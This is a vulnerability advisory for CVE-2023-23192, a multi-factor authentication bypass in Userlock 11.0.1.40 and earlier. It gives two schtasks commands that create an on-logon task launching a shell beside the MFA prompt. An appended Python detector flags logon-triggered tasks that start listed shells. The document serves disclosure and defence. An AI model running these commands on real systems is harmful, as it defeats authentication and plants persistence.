CVE-2023-23192
CVE-2023-23192 - Userlock - Multi-Factor Authentication (MFA) Bypass
Exploit Title: Userlock - Multi-Factor Authentication (MFA) Bypass
Date: 01/11/2023
Exploit Author: Pinar Sadioglu
Vendor Homepage: https://www.isdecisions.com/products/userlock/help/#
Version: <= 11.0.1.40
Tested on: Windows 10
Software: Tested with the Userlock 'Desktop agent' to protect interactive sessions on workstations or on terminal servers.
CVE : CVE-2023-23192
MITRE ATT&CK: T1053.005 - Scheduled Task/Job: Scheduled Task
Permissions Required: Administrator, Root
https://nvd.nist.gov/vuln/detail/CVE-2023-23192
Description: Userlock is a Multi-Factor Authentication solution for Windows Active Directory & Cloud Environments to stop unauthorized and unwanted access. It enables customized two-factor authentication (2FA) on Windows logon, Remote Desktop (RDP & RD Gateway), IIS, VPN and Cloud Applications. Userlock allows you to implement MFA for Active Directory logons on domain-joined workstations and servers. At a user's first logon of the day to their workstation, a dialog box prompts for the OTP code from the Authenticator App. Userlock integrates with the logon process to deliver two-factor authentication.
Task scheduling is one of the strategies most commonly exploited by threat actors to build persistence on a victim's computer. Adversaries frequently use this strategy to evade automated detection, maintain persistence, and carry out surprise attacks after long periods of lying low.
Vulnerability:
Create a scheduled task that is executed at logon of any user.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c powershell.exe"
After successfully logging on with the domain credentials, the scheduled cmd.exe is presented along with the Userlock MFA dialog box.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c explorer.exe"
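
A defensive check for the task pattern above, as an added example that is not part of the original advisory: it parses Task Scheduler XML (as exported by `schtasks /query /xml` or carried in Security event 4698) and flags logon-triggered tasks that start a shell. The shell list, the sample XML and the function names are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Assumption: which programs count as interactive shells is a local policy choice.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}

# Constructed samples (not captured data): an on-logon task like the one in the
# advisory, and a daily maintenance task that should not be flagged.
SAMPLE_LOGON_SHELL = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions><Exec><Command>cmd.exe</Command><Arguments>/c powershell.exe</Arguments></Exec></Actions>
</Task>"""
SAMPLE_DAILY = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2023-01-11T02:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions><Exec><Command>C:\\Tools\\backup.exe</Command></Exec></Actions>
</Task>"""

def _text(node, path):
    return (node.findtext(path, default="", namespaces=NS) or "").strip()

def _basename(token):
    return token.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()

def logon_scopes(root):
    """Return the scope of every enabled LogonTrigger ('any user' if no UserId)."""
    scopes = []
    for trig in root.findall("t:Triggers/t:LogonTrigger", NS):
        if _text(trig, "t:Enabled").lower() != "false":
            scopes.append(_text(trig, "t:UserId") or "any user")
    return scopes

def logon_shell_findings(task_xml):
    """Flag Exec actions that start a shell from a task with a logon trigger."""
    root = ET.fromstring(task_xml)
    scopes = logon_scopes(root)
    if not scopes:
        return []
    findings = []
    for act in root.findall("t:Actions/t:Exec", NS):
        command, args = _text(act, "t:Command"), _text(act, "t:Arguments")
        hits = sorted({_basename(t) for t in [command, *args.split()]} & SHELLS)
        if hits:
            findings.append({"command": command, "arguments": args,
                             "scopes": scopes, "shells": hits})
    return findings

if __name__ == "__main__":
    for name, xml in (("logon-shell", SAMPLE_LOGON_SHELL), ("daily", SAMPLE_DAILY)):
        print(name, logon_shell_findings(xml))
```

A finding is a lead for review rather than proof of abuse, since legitimate logon scripts also start shells; the scope field shows whether the trigger applies to any user or to a single account.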